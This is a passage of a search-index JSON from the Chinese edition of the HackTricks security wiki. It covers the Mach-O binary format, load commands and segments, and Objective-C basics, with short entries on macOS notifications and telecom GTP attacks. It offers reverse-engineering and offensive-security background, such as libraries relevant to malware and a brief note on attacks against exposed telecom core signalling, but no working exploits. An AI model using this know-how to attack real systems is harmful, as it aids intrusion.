Memory » macOS Sensitive Locations & Interesting Daemons » 苹果推送通知 (APN)","id":"2283","title":"苹果推送通知 (APN)"},"2284":{"body":"这些是用户应该在屏幕上看到的通知: CFUserNotification :这个 API 提供了一种在屏幕上显示带有消息的弹出窗口的方法。 公告板 :这在 iOS 上显示一个会消失的横幅,并将存储在通知中心。 NSUserNotificationCenter :这是 MacOS 中的 iOS 公告板。通知的数据库位于 /var/folders//0/com.apple.notificationcenter/db2/db tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 用户通知","id":"2284","title":"用户通知"},"2285":{"body":"Reading time: 19 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » macOS Universal binaries & Mach-O Format","id":"2285","title":"macOS Universal binaries & Mach-O Format"},"2286":{"body":"Mac OS 二进制文件通常被编译为 universal binaries 。一个 universal binary 可以 在同一个文件中支持多个架构 。 这些二进制文件遵循 Mach-O 结构 ,基本由以下部分组成: 头部 加载命令 数据 https://alexdremov.me/content/images/2022/10/6XLCD.gif","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » 基本信息","id":"2286","title":"基本信息"},"2287":{"body":"使用以下命令搜索文件: mdfind fat.h | grep -i mach-o | grep -E \\"fat.h$\\" #define FAT_MAGIC\\t0xcafebabe\\n#define FAT_CIGAM\\t0xbebafeca\\t/* NXSwapLong(FAT_MAGIC) */ struct fat_header { uint32_t\\tmagic; /* FAT_MAGIC 或 FAT_MAGIC_64 */ uint32_t\\tnfat_arch;\\t/* 后续结构的数量 */\\n}; struct fat_arch {\\ncpu_type_t\\tcputype;\\t/* cpu 说明符 (int) */\\ncpu_subtype_t\\tcpusubtype;\\t/* 机器说明符 (int) */\\nuint32_t\\toffset; /* 文件偏移到此目标文件 */\\nuint32_t\\tsize; /* 此目标文件的大小 */\\nuint32_t\\talign; /* 以 2 的幂为单位的对齐 */\\n}; 头部包含 magic 字节,后面是文件 包含 的 archs 的 数量 (nfat_arch),每个架构将有一个 fat_arch 结构。 使用以下命令检查: % file /bin/ls\\n/bin/ls: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64e:Mach-O 64-bit executable arm64e]\\n/bin/ls (for architecture x86_64):\\tMach-O 64-bit executable x86_64\\n/bin/ls (for architecture arm64e):\\tMach-O 64-bit executable arm64e % otool -f -v /bin/ls\\nFat headers\\nfat_magic FAT_MAGIC\\nnfat_arch 2\\narchitecture x86_64 cputype CPU_TYPE_X86_64\\ncpusubtype CPU_SUBTYPE_X86_64_ALL\\ncapabilities 0x0 offset 16384 size 72896 align 2^14 (16384)\\narchitecture arm64e cputype CPU_TYPE_ARM64\\ncpusubtype CPU_SUBTYPE_ARM64E\\ncapabilities PTR_AUTH_VERSION USERSPACE 0 offset 98304 size 88816 align 2^14 (16384) 或者使用 Mach-O View 工具: 正如你所想,通常为 2 个架构编译的 universal binary 会使文件大小翻倍 ,而为 1 个架构编译的文件则不会。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Fat Header","id":"2287","title":"Fat Header"},"2288":{"body":"头部包含有关文件的基本信息,例如用于识别它为 Mach-O 文件的 magic 字节和有关目标架构的信息。你可以在以下路径找到它: mdfind loader.h | grep -i mach-o | grep -E \\"loader.h$\\" c #define\\tMH_MAGIC\\t0xfeedface\\t/* the mach magic number */\\n#define MH_CIGAM\\t0xcefaedfe\\t/* NXSwapInt(MH_MAGIC) */\\nstruct mach_header {\\nuint32_t\\tmagic; /* mach magic number identifier */\\ncpu_type_t\\tcputype;\\t/* cpu specifier (e.g. I386) */\\ncpu_subtype_t\\tcpusubtype;\\t/* machine specifier */\\nuint32_t\\tfiletype;\\t/* type of file (usage and alignment for the file) */\\nuint32_t\\tncmds; /* number of load commands */\\nuint32_t\\tsizeofcmds;\\t/* the size of all the load commands */\\nuint32_t\\tflags; /* flags */\\n}; #define MH_MAGIC_64 0xfeedfacf /* the 64-bit mach magic number */\\n#define MH_CIGAM_64 0xcffaedfe /* NXSwapInt(MH_MAGIC_64) */\\nstruct mach_header_64 {\\nuint32_t\\tmagic; /* mach magic number identifier */\\nint32_t cputype;\\t/* cpu specifier */\\nint32_t cpusubtype;\\t/* machine specifier */\\nuint32_t\\tfiletype;\\t/* type of file */\\nuint32_t\\tncmds; /* number of load commands */\\nuint32_t\\tsizeofcmds;\\t/* the size of all the load commands */\\nuint32_t\\tflags; /* flags */\\nuint32_t\\treserved;\\t/* reserved */\\n};","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O Header","id":"2288","title":"Mach-O Header"},"2289":{"body":"有不同的文件类型,可以在 源代码中找到定义,例如这里 。最重要的类型有: MH_OBJECT: 可重定位目标文件(编译的中间产品,尚未成为可执行文件)。 MH_EXECUTE: 可执行文件。 MH_FVMLIB: 固定虚拟机库文件。 MH_CORE: 代码转储 MH_PRELOAD: 预加载的可执行文件(在 XNU 中不再支持) MH_DYLIB: 动态库 MH_DYLINKER: 动态链接器 MH_BUNDLE: “插件文件”。使用 gcc 的 -bundle 生成,并由 NSBundle 或 dlopen 显式加载。 MH_DYSM: 伴随的 .dSym 文件(用于调试的符号文件)。 MH_KEXT_BUNDLE: 内核扩展。 bash # Checking the mac header of a binary\\notool -arch arm64e -hv /bin/ls\\nMach header\\nmagic cputype cpusubtype caps filetype ncmds sizeofcmds flags\\nMH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DYLDLINK TWOLEVEL PIE 或使用 Mach-O View :","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 文件类型","id":"2289","title":"Mach-O 文件类型"},"229":{"body":"Legless – IPv6 Penetration Testing mitm6 RFC 8106 – IPv6 ND DNS Configuration http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904 Practical Guide to IPv6 Attacks in a Local Network FiberGateway GR241AG – Full Exploit Chain tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 参考文献","id":"229","title":"参考文献"},"2290":{"body":"源代码还定义了几个用于加载库的标志: MH_NOUNDEFS:没有未定义的引用(完全链接) MH_DYLDLINK:Dyld 链接 MH_PREBOUND:动态引用预绑定。 MH_SPLIT_SEGS:文件分割 r/o 和 r/w 段。 MH_WEAK_DEFINES:二进制文件具有弱定义符号 MH_BINDS_TO_WEAK:二进制文件使用弱符号 MH_ALLOW_STACK_EXECUTION:使堆栈可执行 MH_NO_REEXPORTED_DYLIBS:库没有 LC_REEXPORT 命令 MH_PIE:位置无关可执行文件 MH_HAS_TLV_DESCRIPTORS:有一个包含线程局部变量的部分 MH_NO_HEAP_EXECUTION:堆/数据页面不执行 MH_HAS_OBJC:二进制文件具有 oBject-C 部分 MH_SIM_SUPPORT:模拟器支持 MH_DYLIB_IN_CACHE:用于共享库缓存中的 dylibs/frameworks。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 标志","id":"2290","title":"Mach-O 标志"},"2291":{"body":"文件在内存中的布局 在这里指定,详细说明了 符号表的位置 、执行开始时主线程的上下文以及所需的 共享库 。向动态加载器 (dyld) 提供了有关二进制文件加载到内存中的过程的指令。 使用 load_command 结构,该结构在提到的 loader.h 中定义: objectivec struct load_command {\\nuint32_t cmd; /* type of load command */\\nuint32_t cmdsize; /* total size of command in bytes */\\n}; 有大约 50 种不同类型的加载命令 ,系统以不同方式处理它们。最常见的有: LC_SEGMENT_64、LC_LOAD_DYLINKER、LC_MAIN、LC_LOAD_DYLIB 和 LC_CODE_SIGNATURE。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 加载命令","id":"2291","title":"Mach-O 加载命令"},"2292":{"body":"tip 基本上,这种类型的加载命令定义了 如何加载 __TEXT (可执行代码) 和 __DATA (进程数据) 段 ,根据二进制文件执行时在数据部分中指示的 偏移量 。 这些命令 定义了段 ,在执行进程时被 映射 到 虚拟内存空间 中。 有 不同类型 的段,例如 __TEXT 段,它包含程序的可执行代码,以及 __DATA 段,它包含进程使用的数据。这些 段位于 Mach-O 文件的数据部分 中。 每个段 可以进一步 划分 为多个 节 。 加载命令结构 包含关于 这些节 在各自段中的 信息 。 在头部,首先找到 段头 : struct segment_command_64 { /* for 64-bit architectures */\\nuint32_t\\tcmd; /* LC_SEGMENT_64 */\\nuint32_t\\tcmdsize;\\t/* includes sizeof section_64 structs */\\nchar segname[16];\\t/* segment name */\\nuint64_t\\tvmaddr; /* memory address of this segment */\\nuint64_t\\tvmsize; /* memory size of this segment */\\nuint64_t\\tfileoff;\\t/* file offset of this segment */\\nuint64_t\\tfilesize;\\t/* amount to map from the file */\\nint32_t maxprot;\\t/* maximum VM protection */\\nint32_t initprot;\\t/* initial VM protection */ uint32_t\\tnsects; /* number of sections in segment */ uint32_t\\tflags; /* flags */\\n}; 段头的示例: 该头部定义了 其后出现的节头的数量 : c struct section_64 { /* for 64-bit architectures */\\nchar sectname[16];\\t/* name of this section */\\nchar segname[16];\\t/* segment this section goes in */\\nuint64_t\\taddr; /* memory address of this section */\\nuint64_t\\tsize; /* size in bytes of this section */\\nuint32_t\\toffset; /* file offset of this section */\\nuint32_t\\talign; /* section alignment (power of 2) */\\nuint32_t\\treloff; /* file offset of relocation entries */\\nuint32_t\\tnreloc; /* number of relocation entries */\\nuint32_t\\tflags; /* flags (section type and attributes)*/\\nuint32_t\\treserved1;\\t/* reserved (for offset or index) */\\nuint32_t\\treserved2;\\t/* reserved (for count or sizeof) */\\nuint32_t\\treserved3;\\t/* reserved */\\n}; 示例 节标题 : 如果你 添加 节偏移 (0x37DC) + 架构开始的偏移 ,在这种情况下 0x18000 --> 0x37DC + 0x18000 = 0x1B7DC 也可以通过 命令行 获取 头信息 : bash otool -lv /bin/ls 常见的由此命令加载的段: __PAGEZERO: 它指示内核 映射 地址零 ,以便 无法读取、写入或执行 。结构中的maxprot和minprot变量设置为零,以指示此页面上 没有读写执行权限 。 此分配对于 缓解NULL指针解引用漏洞 非常重要。这是因为XNU强制实施一个硬页面零,确保内存的第一页(仅第一页)不可访问(在i386中除外)。一个二进制文件可以通过制作一个小的__PAGEZERO(使用-pagezero_size)来满足这些要求,以覆盖前4k,并使其余的32位内存在用户模式和内核模式下可访问。 __TEXT :包含 可执行 代码 ,具有 读取 和 执行 权限(不可写)。此段的常见部分: __text:编译的二进制代码 __const:常量数据(只读) __ [c/u/os_log]string:C、Unicode或os日志字符串常量 __stubs和__stubs_helper:在动态库加载过程中涉及 __unwind_info:堆栈展开数据。 请注意,所有这些内容都是签名的,但也被标记为可执行(为不一定需要此权限的部分(如专用字符串部分)创建更多的利用选项)。 __DATA :包含 可读 和 可写 的数据(不可执行)。 __got: 全局偏移表 __nl_symbol_ptr:非惰性(加载时绑定)符号指针 __la_symbol_ptr:惰性(使用时绑定)符号指针 __const:应为只读数据(实际上不是) __cfstring:CoreFoundation字符串 __data:全局变量(已初始化) __bss:静态变量(未初始化) __objc_*(__objc_classlist,__objc_protolist等):由Objective-C运行时使用的信息 __DATA_CONST :__DATA.__const不保证是常量(写权限),其他指针和GOT也是如此。此部分使用mprotect使__const、一些初始化程序和GOT表(解析后) 只读 。 __LINKEDIT :包含链接器(dyld)所需的信息,例如符号、字符串和重定位表条目。它是一个通用容器,包含不在__TEXT或__DATA中的内容,其内容在其他加载命令中描述。 dyld信息:重定位、非惰性/惰性/弱绑定操作码和导出信息 函数开始:函数的起始地址表 代码中的数据:__text中的数据岛 符号表:二进制中的符号 间接符号表:指针/存根符号 字符串表 代码签名 __OBJC :包含由Objective-C运行时使用的信息。尽管这些信息也可能在__DATA段中找到,在各种__objc_*部分中。 __RESTRICT :一个没有内容的段,只有一个名为**__restrict**(也为空)的单一部分,确保在运行二进制文件时,它将忽略DYLD环境变量。 正如在代码中所看到的, 段也支持标志 (尽管它们并不常用): SG_HIGHVM:仅核心(未使用) SG_FVMLIB:未使用 SG_NORELOC:段没有重定位 SG_PROTECTED_VERSION_1:加密。例如,Finder用于加密文本__TEXT段。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_SEGMENT/LC_SEGMENT_64","id":"2292","title":"LC_SEGMENT/LC_SEGMENT_64"},"2293":{"body":"LC_MAIN 包含 entryoff属性 中的入口点。在加载时, dyld 简单地 将 此值添加到(内存中的) 二进制文件基址 ,然后 跳转 到此指令以开始执行二进制代码。 **LC_UNIXTHREAD 包含启动主线程时寄存器必须具有的值。这已经被弃用,但 dyld**仍在使用它。可以通过以下方式查看寄存器设置的值: bash otool -l /usr/lib/dyld\\n[...]\\nLoad command 13\\ncmd LC_UNIXTHREAD\\ncmdsize 288\\nflavor ARM_THREAD_STATE64\\ncount ARM_THREAD_STATE64_COUNT\\nx0 0x0000000000000000 x1 0x0000000000000000 x2 0x0000000000000000\\nx3 0x0000000000000000 x4 0x0000000000000000 x5 0x0000000000000000\\nx6 0x0000000000000000 x7 0x0000000000000000 x8 0x0000000000000000\\nx9 0x0000000000000000 x10 0x0000000000000000 x11 0x0000000000000000\\nx12 0x0000000000000000 x13 0x0000000000000000 x14 0x0000000000000000\\nx15 0x0000000000000000 x16 0x0000000000000000 x17 0x0000000000000000\\nx18 0x0000000000000000 x19 0x0000000000000000 x20 0x0000000000000000\\nx21 0x0000000000000000 x22 0x0000000000000000 x23 0x0000000000000000\\nx24 0x0000000000000000 x25 0x0000000000000000 x26 0x0000000000000000\\nx27 0x0000000000000000 x28 0x0000000000000000 fp 0x0000000000000000\\nlr 0x0000000000000000 sp 0x0000000000000000 pc 0x0000000000004b70\\ncpsr 0x00000000 [...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_UNIXTHREAD/LC_MAIN","id":"2293","title":"LC_UNIXTHREAD/LC_MAIN"},"2294":{"body":"包含关于 Macho-O 文件的代码签名 的信息。它仅包含一个 偏移量 ,指向 签名 blob 。这通常位于文件的最末尾。 然而,您可以在 这篇博客文章 和这个 gists 中找到一些关于此部分的信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_CODE_SIGNATURE","id":"2294","title":"LC_CODE_SIGNATURE"},"2295":{"body":"支持二进制加密。然而,当然,如果攻击者设法破坏了进程,他将能够以未加密的方式转储内存。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_ENCRYPTION_INFO[_64]","id":"2295","title":"LC_ENCRYPTION_INFO[_64]"},"2296":{"body":"包含 动态链接器可执行文件的路径 ,该文件将共享库映射到进程地址空间。 值始终设置为 /usr/lib/dyld 。重要的是要注意,在 macOS 中,dylib 映射发生在 用户模式 ,而不是内核模式。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_LOAD_DYLINKER","id":"2296","title":"LC_LOAD_DYLINKER"},"2297":{"body":"过时,但当配置为在崩溃时生成转储时,会创建一个 Mach-O 核心转储,并在 LC_IDENT 命令中设置内核版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_IDENT","id":"2297","title":"LC_IDENT"},"2298":{"body":"随机 UUID。它对任何直接的事情都很有用,但 XNU 将其与其他进程信息一起缓存。它可以在崩溃报告中使用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_UUID","id":"2298","title":"LC_UUID"},"2299":{"body":"允许在进程执行之前向 dyld 指示环境变量。这可能非常危险,因为它可能允许在进程内部执行任意代码,因此此加载命令仅在使用 #define SUPPORT_LC_DYLD_ENVIRONMENT 构建的 dyld 中使用,并进一步限制处理仅限于形式为 DYLD_..._PATH 的变量,指定加载路径。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_DYLD_ENVIRONMENT","id":"2299","title":"LC_DYLD_ENVIRONMENT"},"23":{"body":"首先,需要指出的是,所有 来自其他网站研究的技术的信用归原作者所有 (页面中有引用)。感谢每一个分享知识以提高互联网安全的研究。 HackTricks 是一个由 Carlos 领导的教育 Wiki,汇集了关于 网络安全 的知识,拥有数百名合作者!这是一个 巨大的黑客技巧集合 ,由社区尽可能地更新,以保持最新。如果您发现有缺失或过时的内容,请发送 Pull Request 到 Hacktricks Github ! HackTricks 也是一个许多研究人员分享他们最新发现的 Wiki,因此这是一个跟上最新黑客技术的好地方。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"About the author » 你好!!","id":"23","title":"你好!!"},"230":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 note 移动核心协议 (GPRS Tunnelling Protocol – GTP) 常常穿越半受信任的 GRX/IPX 漫游骨干。由于它们使用明文 UDP 且几乎没有认证, 任何在电信周边取得的立足点通常都能直接到达核心信令平面 。以下笔记收集了在野外针对 SGSN/GGSN、PGW/SGW 和其它 EPC 节点观察到的攻击技巧。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » Telecom Network Exploitation (GTP / 漫游环境)","id":"230","title":"Telecom Network Exploitation (GTP / 漫游环境)"},"2300":{"body":"此加载命令描述了一个 动态 库 依赖关系, 指示 加载器 (dyld) 加载和链接该库 。每个 Mach-O 二进制文件所需的库都有一个 LC_LOAD_DYLIB 加载命令。 此加载命令是 dylib_command 类型的结构(其中包含一个描述实际依赖动态库的 struct dylib): objectivec struct dylib_command {\\nuint32_t cmd; /* LC_LOAD_{,WEAK_}DYLIB */\\nuint32_t cmdsize; /* includes pathname string */\\nstruct dylib dylib; /* the library identification */\\n}; struct dylib {\\nunion lc_str name; /* library\'s path name */\\nuint32_t timestamp; /* library\'s build time stamp */\\nuint32_t current_version; /* library\'s current version number */\\nuint32_t compatibility_version; /* library\'s compatibility vers number*/\\n}; 您还可以通过命令行获取此信息: bash otool -L /bin/ls\\n/bin/ls:\\n/usr/lib/libutil.dylib (compatibility version 1.0.0, current version 1.0.0)\\n/usr/lib/libncurses.5.4.dylib (compatibility version 5.4.0, current version 5.4.0)\\n/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1319.0.0) 一些潜在的与恶意软件相关的库包括: DiskArbitration : 监控 USB 驱动器 AVFoundation: 捕获音频和视频 CoreWLAN : Wifi 扫描。 note Mach-O 二进制文件可以包含一个或 多个 构造函数 ,这些构造函数将在 LC_MAIN 指定的地址 之前 被 执行 。 任何构造函数的偏移量保存在 __mod_init_func 段的 __DATA_CONST 部分中。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » LC_LOAD_DYLIB","id":"2300","title":"LC_LOAD_DYLIB"},"2301":{"body":"文件的核心是数据区域,由加载命令区域中定义的多个段组成。 每个段中可以包含多种数据部分 ,每个部分 保存特定类型的代码或数据 。 tip 数据基本上是包含所有由加载命令 LC_SEGMENTS_64 加载的 信息 的部分。 https://www.oreilly.com/api/v2/epubs/9781785883378/files/graphics/B05055_02_38.jpg 这包括: 函数表: 包含有关程序函数的信息。 符号表 : 包含有关二进制文件使用的外部函数的信息 还可能包含内部函数、变量名称等。 要检查它,您可以使用 Mach-O View 工具: 或者从命令行: bash size -m /bin/ls","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O 数据","id":"2301","title":"Mach-O 数据"},"2302":{"body":"在 __TEXT 段 (r-x): __objc_classname: 类名 (字符串) __objc_methname: 方法名 (字符串) __objc_methtype: 方法类型 (字符串) 在 __DATA 段 (rw-): __objc_classlist: 所有 Objective-C 类的指针 __objc_nlclslist: 非懒加载 Objective-C 类的指针 __objc_catlist: 类别的指针 __objc_nlcatlist: 非懒加载类别的指针 __objc_protolist: 协议列表 __objc_const: 常量数据 __objc_imageinfo, __objc_selrefs, objc__protorefs...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Objetive-C 常见部分","id":"2302","title":"Objetive-C 常见部分"},"2303":{"body":"_swift_typeref, _swift3_capture, _swift3_assocty, _swift3_types, _swift3_proto, _swift3_fieldmd, _swift3_builtin, _swift3_reflstr tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Swift","id":"2303","title":"Swift"},"2304":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » macOS Objective-C","id":"2304","title":"macOS Objective-C"},"2305":{"body":"caution 请注意,用 Objective-C 编写的程序在编译成 Mach-O binaries 时 保留 其类声明。这些类声明 包括 的信息有: 类名 类方法 类实例变量 您可以使用 class-dump 获取这些信息: bash class-dump Kindle.app 请注意,这些名称可能会被混淆,以使二进制文件的逆向工程更加困难。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » Objective-C","id":"2305","title":"Objective-C"},"2306":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 类、方法和对象","id":"2306","title":"类、方法和对象"},"2307":{"body":"objectivec // Declare the interface of the class\\n@interface MyVehicle : NSObject // Declare the properties\\n@property NSString *vehicleType;\\n@property int numberOfWheels; // Declare the methods\\n- (void)startEngine;\\n- (void)addWheels:(int)value; @end","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 接口、属性和方法","id":"2307","title":"接口、属性和方法"},"2308":{"body":"objectivec @implementation MyVehicle : NSObject // No need to indicate the properties, only define methods - (void)startEngine {\\nNSLog(@\\"Engine started\\");\\n} - (void)addWheels:(int)value {\\nself.numberOfWheels += value;\\n} @end","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 类","id":"2308","title":"类"},"2309":{"body":"要创建一个类的实例,调用 alloc 方法,该方法 为每个属性分配内存 并 将这些分配置为零 。然后调用 init ,该方法 将属性初始化为所需的值 。 objectivec // Something like this:\\nMyVehicle *newVehicle = [[MyVehicle alloc] init]; // Which is usually expressed as:\\nMyVehicle *newVehicle = [MyVehicle new]; // To call a method\\n// [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]\\n[newVehicle addWheels:4];","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 对象与调用方法","id":"2309","title":"对象与调用方法"},"231":{"body":"","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 1. Recon & Initial Access","id":"231","title":"1. Recon & Initial Access"},"2310":{"body":"类方法是用 加号 (+) 定义的,而不是用于实例方法的 减号 (-)。例如 NSString 类方法 stringWithString : objectivec + (id)stringWithString:(NSString *)aString;","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 类方法","id":"2310","title":"类方法"},"2311":{"body":"要 设置 和 获取 属性,您可以使用 点表示法 或像 调用方法 一样进行: objectivec // Set\\nnewVehicle.numberOfWheels = 2;\\n[newVehicle setNumberOfWheels:3]; // Get\\nNSLog(@\\"Number of wheels: %i\\", newVehicle.numberOfWheels);\\nNSLog(@\\"Number of wheels: %i\\", [newVehicle numberOfWheels]);","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » Setter & Getter","id":"2311","title":"Setter & Getter"},"2312":{"body":"除了 setter 和 getter 方法,你可以使用实例变量。这些变量与属性同名,但以 \\"_\\" 开头: objectivec - (void)makeLongTruck {\\n_numberOfWheels = +10000;\\nNSLog(@\\"Number of wheels: %i\\", self.numberOfLeaves);\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 实例变量","id":"2312","title":"实例变量"},"2313":{"body":"协议是一组方法声明(没有属性)。实现协议的类实现声明的方法。 方法有两种类型: 必需 和 可选 。默认情况下,方法是 必需 的(但您也可以使用**@required 标签来指示)。要指示方法是可选的,请使用 @optional**。 objectivec @protocol myNewProtocol\\n- (void) method1; //mandatory\\n@required\\n- (void) method2; //mandatory\\n@optional\\n- (void) method3; //optional\\n@end","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 协议","id":"2313","title":"协议"},"2314":{"body":"objectivec // gcc -framework Foundation test_obj.m -o test_obj\\n#import @protocol myVehicleProtocol\\n- (void) startEngine; //mandatory\\n@required\\n- (void) addWheels:(int)value; //mandatory\\n@optional\\n- (void) makeLongTruck; //optional\\n@end @interface MyVehicle : NSObject @property int numberOfWheels; - (void)startEngine;\\n- (void)addWheels:(int)value;\\n- (void)makeLongTruck; @end @implementation MyVehicle : NSObject - (void)startEngine {\\nNSLog(@\\"Engine started\\");\\n} - (void)addWheels:(int)value {\\nself.numberOfWheels += value;\\n} - (void)makeLongTruck {\\n_numberOfWheels = +10000;\\nNSLog(@\\"Number of wheels: %i\\", self.numberOfWheels);\\n} @end int main() {\\nMyVehicle* mySuperCar = [MyVehicle new];\\n[mySuperCar startEngine];\\nmySuperCar.numberOfWheels = 4;\\nNSLog(@\\"Number of wheels: %i\\", mySuperCar.numberOfWheels);\\n[mySuperCar setNumberOfWheels:3];\\nNSLog(@\\"Number of wheels: %i\\", mySuperCar.numberOfWheels);\\n[mySuperCar makeLongTruck];\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 一起","id":"2314","title":"一起"},"2315":{"body":"字符串 objectivec // NSString\\nNSString *bookTitle = @\\"The Catcher in the Rye\\";\\nNSString *bookAuthor = [[NSString alloc] initWithCString:\\"J.D. Salinger\\" encoding:NSUTF8StringEncoding];\\nNSString *bookPublicationYear = [NSString stringWithCString:\\"1951\\" encoding:NSUTF8StringEncoding]; 基本类是 不可变的 ,因此要将一个字符串附加到现有字符串上, 需要创建一个新的NSString 。 objectivec NSString *bookDescription = [NSString stringWithFormat:@\\"%@ by %@ was published in %@\\", bookTitle, bookAuthor, bookPublicationYear]; 或者你也可以使用一个 可变 字符串类: objectivec 